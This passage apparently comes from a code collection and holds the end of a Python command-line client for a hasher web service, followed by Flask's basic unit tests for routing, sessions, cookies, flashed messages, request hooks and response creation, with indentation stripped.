'''Returns the filtered file of the given Url and AU
'''
req = HasherServiceImplService_client.hash()
req.HasherParams = req.new_hasherParams()
req.HasherParams = HasherServiceImplService_client.hasherParams
req.HasherParams.AuId = auid
req.HasherParams.Url = url
req.HasherParams.HashType = "V3File"
req.HasherParams.RecordFilteredStream = "True"
return _ws_port(host, auth, sys.stdout).hash(req).Return
def hash_asynchronously_au(host, auth, auid):
'''Returns a request id for a asychrounous hash of the given AU
'''
req = HasherServiceImplService_client.hashAsynchronously()
req.HasherParams = req.new_hasherParams()
req.HasherParams.AuId = auid
try: return _ws_port(host, auth).hashAsynchronously(req).Return.RequestId
except AttributeError: return None
def hash_asynchronously_au_url(host, auth, auid, url):
'''Returns a request id for a asychrounous hash of the given url
'''
req = HasherServiceImplService_client.hashAsynchronously()
req.HasherParams = req.new_hasherParams()
req.HasherParams.AuId = auid
req.HasherParams.Url = url
req.HasherParams.HashType = "V3File"
req.HasherParams.RecordFilteredStream = True
try: return _ws_port(host, auth).hashAsynchronously(req).Return.RequestId
except AttributeError: return None
def get_asynchronous_hash_result(host, auth, request_id):
'''Returns a hash result for the hash associated with given request_id
'''
req = HasherServiceImplService_client.getAsynchronousHashResult()
req.RequestId = request_id
return _ws_port(host, auth).getAsynchronousHashResult(req).Return
def remove_asynchronous_hash_request(host, auth, request_id):
'''Removes the hash associated with given request_id
'''
req = HasherServiceImplService_client.removeAsynchronousHashRequest()
req.RequestId = request_id
return _ws_port(host, auth).removeAsynchronousHashRequest(req).Return
def _ws_port(host, auth, tracefile=None):
url = 'http://%s/ws/HasherService' % (host,)
locator = HasherServiceImplService_client.HasherServiceImplServiceLocator()
if tracefile is None: return locator.getHasherServiceImplPort(url=url, auth=auth)
else: return locator.getHasherServiceImplPort(url=url, auth=auth, tracefile=tracefile)
#
# Command line tool
#
class _HasherServiceOptions(object):
@staticmethod
def make_parser():
usage = '%prog [--host=HOST|--hosts=HFILE]... --auid=AUID [--url=URL] [--output-directory=OUTDIR] --output-prefix=PREFIX [OPTIONS]'
parser = optparse.OptionParser(version=__version__, description=__doc__, usage=usage)
# Hosts
group = optparse.OptionGroup(parser, 'Hosts')
group.add_option('--host', action='append', default=list(), help='add host:port pair to list of target hosts')
group.add_option('--hosts', action='append', default=list(), metavar='HFILE', help='add host:port pairs in HFILE to list of target hosts')
group.add_option('--password', metavar='PASS', help='UI password (default: interactive prompt)')
group.add_option('--username', metavar='USER', help='UI username (default: interactive prompt)')
parser.add_option_group(group)
# AUID and URL
group = optparse.OptionGroup(parser, 'AUID and URL')
group.add_option('--auid', help='target AUID')
group.add_option('--url', help='target URL (optional)')
parser.add_option_group(group)
# Output
group = optparse.OptionGroup(parser, 'Output')
group.add_option('--output-directory', metavar='OUTDIR', default='.', help='output directory (default: current directory)')
group.add_option('--output-prefix', metavar='PREFIX', default='hasherservice', help='prefix for output file names (default: "hasherservice")')
parser.add_option_group(group)
# Other options
group = optparse.OptionGroup(parser, 'Other options')
group.add_option('--long-html-line', action='store_true', help='add a newline before each "<" character')
group.add_option('--long-text-line', action='store_true', help='replace each space with a newline')
group.add_option('--threads', type='int', help='maximum number of parallel jobs allowed (default: no limit)')
group.add_option('--wait', type='int', help='seconds to wait between asynchronous checks (default: 10 with --url, 30 without)')
parser.add_option_group(group)
return parser
def __init__(self, parser, opts, args):
super(_HasherServiceOptions, self).__init__()
if len(args) != 0: parser.error('extraneous arguments: %s' % (' '.join(args)))
# hosts
self.hosts = opts.host[:]
for f in opts.hosts: self.hosts.extend(_file_lines(f))
if len(self.hosts) == 0: parser.error('at least one target host is required')
# auid/url
self.auid = opts.auid
self.url = opts.url
# output_directory/output_prefix
self.output_directory = os.path.expanduser(opts.output_directory)
if not os.path.isdir(self.output_directory):
parser.error('no such directory: %s' % (self.output_directory,))
if opts.output_prefix is None: parser.error('--output-prefix is required')
if '/' in opts.output_prefix: parser.error('output prefix cannot contain a slash')
self.output_prefix = opts.output_prefix
# long_html_line/long_text_line/wait/threads
if any([opts.long_html_line, opts.long_text_line]) and self.url is None:
parser.error('--long-html-line, --long-text-line only apply to --url')
if opts.long_html_line and opts.long_text_line:
parser.error('--long-html-line, --long-text-line are incompatible')
self.long_html_line = opts.long_html_line
self.long_text_line = opts.long_text_line
if opts.wait is None: self.wait = 30 if self.url is None else 10
else: self.wait = opts.wait
# threads
self.threads = opts.threads or len(self.hosts)
# auth
u = opts.username or getpass.getpass('UI username: ')
p = opts.password or getpass.getpass('UI password: ')
self.auth = zsiauth(u, p)
def _do_hash(options, host):
if options.url is None: reqid = hash_asynchronously_au(host, options.auth, options.auid)
else: reqid = hash_asynchronously_au_url(host, options.auth, options.auid, options.url)
if reqid is None: return host, False
while True:
time.sleep(options.wait)
res = get_asynchronous_hash_result(host, options.auth, reqid)
if res._status == 'Done': break
if options.url is None:
source = res._blockFileDataHandler
fstr = '%s.%s.hash' % (options.output_prefix, host)
else:
source = res._recordFileDataHandler
fstr = '%s.%s.filtered' % (options.output_prefix, host)
if source is not None:
lines = [line for line in source]
if options.long_html_line: lines = map(lambda s: s.replace('<', '\n<'), lines)
if options.long_text_line: lines = map(lambda s: s.replace(' ', '\n'), lines)
with open(os.path.join(options.output_directory, fstr), 'w') as f:
f.writelines(lines)
res = remove_asynchronous_hash_request(host, options.auth, reqid)
return host, source is not None
def _do_hashes(options):
for host, result in ThreadPool(options.threads).imap_unordered( \
lambda _host: _do_hash(options, _host), \
options.hosts):
if result is False:
sys.stderr.write('Warning: not found on %s\n' % (host,))
# Last modified 2015-08-31
def _file_lines(fstr):
with open(os.path.expanduser(fstr)) as f: ret = filter(lambda y: len(y) > 0, [x.partition('#')[0].strip() for x in f])
if len(ret) == 0: sys.exit('Error: %s contains no meaningful lines' % (fstr,))
return ret
def _main():
'''Main method.'''
parser = _HasherServiceOptions.make_parser()
(opts, args) = parser.parse_args()
options = _HasherServiceOptions(parser, opts, args)
t = Thread(target=_do_hashes, args=(options,))
t.daemon = True
t.start()
while True:
t.join(1.5)
if not t.is_alive(): break
# Main entry point
if __name__ == '__main__': _main()
|
test_basic.py
|
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import re
import uuid
import time
import flask
import pickle
from datetime import datetime
from threading import Thread
from flask._compat import text_type
from werkzeug.exceptions import BadRequest, NotFound, Forbidden
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import werkzeug.serving
def test_options_work():
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
assert rv.data == b''
def test_options_on_multiple_rules():
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
@app.route('/', methods=['PUT'])
def index_put():
return 'Aha!'
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT']
def test_options_handling_disabled():
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
assert sorted(rv.allow) == ['OPTIONS']
def test_request_dispatching():
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
c = app.test_client()
assert c.get('/').data == b'GET'
rv = c.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = c.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert c.post('/more').data == b'POST'
assert c.get('/more').data == b'GET'
rv = c.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
def test_disallow_string_for_allowed_methods():
app = flask.Flask(__name__)
with pytest.raises(TypeError):
@app.route('/', methods='GET POST')
def index():
return "Hey"
def test_url_mapping():
app = flask.Flask(__name__)
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
# Issue 1288: Test that automatic options are not added when non-uppercase 'options' in methods
app.add_url_rule('/options', 'options', options, methods=['options'])
c = app.test_client()
assert c.get('/').data == b'GET'
rv = c.post('/')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS']
rv = c.head('/')
assert rv.status_code == 200
assert not rv.data # head truncates
assert c.post('/more').data == b'POST'
assert c.get('/more').data == b'GET'
rv = c.delete('/more')
assert rv.status_code == 405
assert sorted(rv.allow) == ['GET', 'HEAD', 'OPTIONS', 'POST']
rv = c.open('/options', method='OPTIONS')
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing():
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
c = app.test_client()
assert c.get('/foo/').data == b'index'
assert c.get('/foo/bar').data == b'bar'
def test_endpoint_decorator():
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
c = app.test_client()
assert c.get('/foo/').data == b'index'
assert c.get('/foo/bar').data == b'bar'
def test_session():
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/set', methods=['POST'])
def set():
flask.session['value'] = flask.request.form['value']
return 'value set'
@app.route('/get')
def get():
return flask.session['value']
c = app.test_client()
assert c.post('/set', data={'value': '42'}).data == b'value set'
assert c.get('/get').data == b'42'
def test_session_using_server_name():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_and_port():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
assert 'domain=.example.com' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_server_name_port_and_path():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080',
APPLICATION_ROOT='/foo'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/foo')
assert 'domain=example.com' in rv.headers['set-cookie'].lower()
assert 'path=/foo' in rv.headers['set-cookie'].lower()
assert 'httponly' in rv.headers['set-cookie'].lower()
def test_session_using_application_root():
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app = flask.Flask(__name__)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
SECRET_KEY='foo',
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
assert 'path=/bar' in rv.headers['set-cookie'].lower()
def test_session_using_session_settings():
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://www.example.com:8080/test/')
cookie = rv.headers['set-cookie'].lower()
assert 'domain=.example.com' in cookie
assert 'path=/' in cookie
assert 'secure' in cookie
assert 'httponly' not in cookie
def test_missing_session():
app = flask.Flask(__name__)
def expect_exception(f, *args, **kwargs):
try:
f(*args, **kwargs)
except RuntimeError as e:
assert e.args and 'session is unavailable' in e.args[0]
else:
assert False, 'expected exception'
with app.test_request_context():
assert flask.session.get('missing_key') is None
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration():
permanent = True
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/')
def index():
flask.session['test'] = 42
flask.session.permanent = permanent
return ''
@app.route('/test')
def test():
return text_type(flask.session.permanent)
client = app.test_client()
rv = client.get('/')
assert 'set-cookie' in rv.headers
match = re.search(r'\bexpires=([^;]+)(?i)', rv.headers['set-cookie'])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get('/test')
assert rv.data == b'True'
permanent = False
rv = app.test_client().get('/')
assert 'set-cookie' in rv.headers
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
assert match is None
def test_session_stored_last():
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
c = app.test_client()
assert c.get('/').data == b'None'
assert c.get('/').data == b'42'
def test_session_special_types():
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.after_request
def modify_session(response):
flask.session['m'] = flask.Markup('Hello!')
flask.session['u'] = the_uuid
flask.session['dt'] = now
flask.session['b'] = b'\xff'
flask.session['t'] = (1, 2, 3)
return response
@app.route('/')
def dump_session_contents():
return pickle.dumps(dict(flask.session))
c = app.test_client()
c.get('/')
rv = pickle.loads(c.get('/').data)
assert rv['m'] == flask.Markup('Hello!')
assert type(rv['m']) == flask.Markup
assert rv['dt'] == now
assert rv['u'] == the_uuid
assert rv['b'] == b'\xff'
assert type(rv['b']) == bytes
assert rv['t'] == (1, 2, 3)
def test_session_cookie_setting():
app = flask.Flask(__name__)
app.testing = True
app.secret_key = 'dev key'
is_permanent = True
@app.route('/bump')
def bump():
rv = flask.session['foo'] = flask.session.get('foo', 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route('/read')
def read():
return str(flask.session.get('foo', 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get('/bump').data == b'1'
assert c.get('/bump').data == b'2'
assert c.get('/bump').data == b'3'
rv = c.get('/read')
set_cookie = rv.headers.get('set-cookie')
assert (set_cookie is not None) == expect_header
assert rv.data == b'3'
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=True)
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
def test_flashes():
app = flask.Flask(__name__)
app.secret_key = 'testkey'
with app.test_request_context():
assert not flask.session.modified
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ['Zap', 'Zip']
def test_extended_flashing():
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
app = flask.Flask(__name__)
app.secret_key = 'testkey'
app.testing = True
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u'Hello World',
u'Hello World',
flask.Markup(u'<em>Testing</em>')
]
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
('message', u'Hello World'),
('error', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(
category_filter=['message'], with_categories=True)
assert list(messages) == [('message', u'Hello World')]
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'], with_categories=True)
assert list(messages) == [
('message', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'])
assert len(messages) == 2
assert messages[0] == u'Hello World'
assert messages[1] == flask.Markup(u'<em>Testing</em>')
return ''
# Create new test client on each test to clean flashed messages.
c = app.test_client()
c.get('/')
c.get('/test/')
c = app.test_client()
c.get('/')
c.get('/test_with_categories/')
c = app.test_client()
c.get('/')
c.get('/test_filter/')
c = app.test_client()
c.get('/')
c.get('/test_filters/')
c = app.test_client()
c.get('/')
c.get('/test_filters_without_returning_categories/')
def test_request_processing():
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += b'|after'
evts.append('after')
return response
@app.route('/')
def index():
assert 'before' in evts
assert 'after' not in evts
return 'request'
assert 'after' not in evts
rv = app.test_client().get('/').data
assert 'after' in evts
assert rv == b'request|after'
def test_request_preprocessing_early_return():
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route('/')
def index():
evts.append('index')
return "damnit"
rv = app.test_client().get('/').data.strip()
assert rv == b'hello'
assert evts == [1, 2]
def test_after_request_processing():
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
c = app.test_client()
resp = c.get('/')
assert resp.status_code == 200
assert resp.headers['X-Foo'] == 'a header'
def test_teardown_request_handler():
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode():
called = []
app = flask.Flask(__name__)
app.testing = True
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_error():
called = []
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route('/')
def fails():
1 // 0
rv = app.test_client().get('/')
assert rv.status_code == 500
assert b'Internal Server Error' in rv.data
assert len(called) == 2
def test_before_after_request_order():
called = []
app = flask.Flask(__name__)
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = app.test_client().get('/')
assert rv.data == b'42'
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling():
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
@app.errorhandler(404)
def not_found(e):
return 'not found', 404
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.errorhandler(Forbidden)
def forbidden(e):
return 'forbidden', 403
@app.route('/')
def index():
flask.abort(404)
@app.route('/error')
def error():
1 // 0
@app.route('/forbidden')
def error2():
flask.abort(403)
c = app.test_client()
rv = c.get('/')
assert rv.status_code == 404
assert rv.data == b'not found'
rv = c.get('/error')
assert rv.status_code == 500
assert b'internal server error' == rv.data
rv = c.get('/forbidden')
assert rv.status_code == 403
assert b'forbidden' == rv.data
def test_before_request_and_routing_errors():
app = flask.Flask(__name__)
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = app.test_client().get('/')
assert rv.status_code == 404
assert rv.data == b'value'
def test_user_error_handling():
class MyException(Exception):
pass
app = flask.Flask(__name__)
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return '42'
@app.route('/')
def index():
raise MyException()
c = app.test_client()
assert c.get('/').data == b'42'
def test_http_error_subclass_handling():
class ForbiddenSubclass(Forbidden):
pass
app = flask.Flask(__name__)
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return 'banana'
@app.errorhandler(403)
def handle_forbidden_subclass(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return 'apple'
@app.route('/1')
def index1():
raise ForbiddenSubclass()
@app.route('/2')
def index2():
flask.abort(403)
@app.route('/3')
def index3():
raise Forbidden()
c = app.test_client()
assert c.get('/1').data == b'banana'
assert c.get('/2').data == b'apple'
assert c.get('/3').data == b'apple'
def test_trapping_of_bad_request_key_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route('/fail')
def fail():
flask.request.form['missing_key']
c = app.test_client()
assert c.get('/fail').status_code == 400
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
c = app.test_client()
try:
c.get('/fail')
except KeyError as e:
assert isinstance(e, BadRequest)
else:
assert False, 'Expected exception'
def test_trapping_of_all_http_exceptions():
app = flask.Flask(__name__)
app.testing = True
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
c = app.test_client()
with pytest.raises(NotFound):
c.get('/fail')
def test_enctype_debug_helper():
from flask.debughelpers import DebugFilesKeyError
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with app.test_client() as c:
try:
c.post('/fail', data={'foo': 'index.txt'})
except DebugFilesKeyError as e:
assert 'no file contents were transmitted' in str(e)
assert 'This was submitted: "index.txt"' in str(e)
else:
assert False, 'Expected exception'
def test_response_creation():
app = flask.Flask(__name__)
@app.route('/unicode')
def from_unicode():
return u'Hällo Wörld'
@app.route('/string')
def from_string():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/args')
def from_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/two_args')
def from_two_args_tuple():
return 'Hello', {
'X-Foo': 'Test',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/args_status')
def from_status_tuple():
return 'Hi, status!', 400
@app.route('/args_header')
def from_response_instance_status_tuple():
return flask.Response('Hello world', 404), {
"X-Foo": "Bar",
"X-Bar": "Foo"
}
c = app.test_client()
assert c.get('/unicode').data == u'Hällo Wörld'.encode('utf-8')
assert c.get('/string').data == u'Hällo Wörld'.encode('utf-8')
rv = c.get('/args')
assert rv.data == b'Meh'
assert rv.headers['X-Foo'] == 'Testing'
assert rv.status_code == 400
assert rv.mimetype == 'text/plain'
rv2 = c.get('/two_args')
assert rv2.data == b'Hello'
assert rv2.headers['X-Foo'] == 'Test'
assert rv2.status_code == 200
assert rv2.mimetype == 'text/plain'
rv3 = c.get('/args_status')
assert rv3.data == b'Hi, status!'
assert rv3.status_code == 400
assert rv3.mimetype == 'text/html'
rv4 = c.get('/args_header')
assert rv4.data == b'Hello world'
assert rv4.headers['X-Foo'] == 'Bar'
assert rv4.headers['X-Bar'] == 'Foo'
assert rv4.status_code == 404
def test_make_response():
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response('Awesome')
assert rv.status_code == 200
assert rv.data == b'Awesome'
assert rv.mimetype == 'text/html'
rv = flask.make_response('W00t', 404)
assert rv.status_code == 404
assert rv.data == b'W00t'
assert rv.mimetype == 'text/html'
def test_make_response_with_response_instance():
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
assert rv.status_code == 400
assert rv.data == b'{\n "msg": "W00t"\n}\n'
assert rv.mimetype == 'application/json'
rv = flask.make_response(
flask.Response(''), 400)
assert rv.status_code == 400
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
assert rv.status_code == 400
assert rv.headers['Content-Type'] == 'text/html'
assert rv.headers['X-Foo'] == 'bar'
def test_jsonify_no_prettyprint():
app = flask.Flask(__name__)
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
with app.test_request_context():
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {
"msg": {
"submsg": "W00t"
},
"msg2": "foobar"
}
rv = flask.make_response(
flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint():
app = flask.Flask(__name__)
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
with app.test_request_context():
compressed_msg = {"msg":{"submsg":"W00t"},"msg2":"foobar"}
pretty_response =\
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
rv = flask.make_response(
flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_url_generation():
app = flask.Flask(__name__)
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
with app.test_request_context():
assert flask.url_for('hello', name='test x') == '/hello/test%20x'
assert flask.url_for('hello', name='test x', _external=True) == \
'http://localhost/hello/test%20x'
def test_build_error_handler():
app = flask.Flask(__name__)
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError as err:
error = err
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
pytest.raises(
BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for('spam') == '/test_handler/'
def test_custom_converters():
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app = flask.Flask(__name__)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
c = app.test_client()
assert c.get('/1,2,3').data == b'1|2|3'
def test_static_files():
app = flask.Flask(__name__)
app.testing = True
rv = app.test_client().get('/static/index.html')
assert rv.status_code == 200
assert rv.data.strip() == b'<h1>Hello World!</h1>'
with app.test_request_context():
assert flask.url_for('static', filename='index.html') == \
'/static/index.html'
rv.close()
def test_none_response():
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def test():
return None
try:
app.test_client().get('/')
except ValueError as e:
assert str(e) == 'View function did not return a response'
pass
else:
assert "Expected ValueError"
def test_request_locals():
assert repr(flask.g) == '<LocalProxy unbound>'
assert not flask.g
def test_test_app_proper_environ():
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return 'Foo'
@app.route('/', subdomain='foo')
def subdomain():
return 'Foo SubDomain'
rv = app.test_client().get('/')
assert rv.data == b'Foo'
rv = app.test_client().get('/', 'http://localhost.localdomain:5000')
assert rv.data == b'Foo'
rv = app.test_client().get('/', 'https://localhost.localdomain:5000')
assert rv.data == b'Foo'
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'https://localhost.localdomain')
assert rv.data == b'Foo'
try:
app.config.update(SERVER_NAME='localhost.localdomain:443')
rv = app.test_client().get('/', 'https://localhost.localdomain')
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain:443') does not match the "
"server name from the WSGI environment ('localhost.localdomain')"
)
try:
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'http://foo.localhost')
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain') does not match the "
"server name from the WSGI environment ('foo.localhost')"
)
rv = app.test_client().get('/', 'http://foo.localhost.localdomain')
assert rv.data == b'Foo SubDomain'
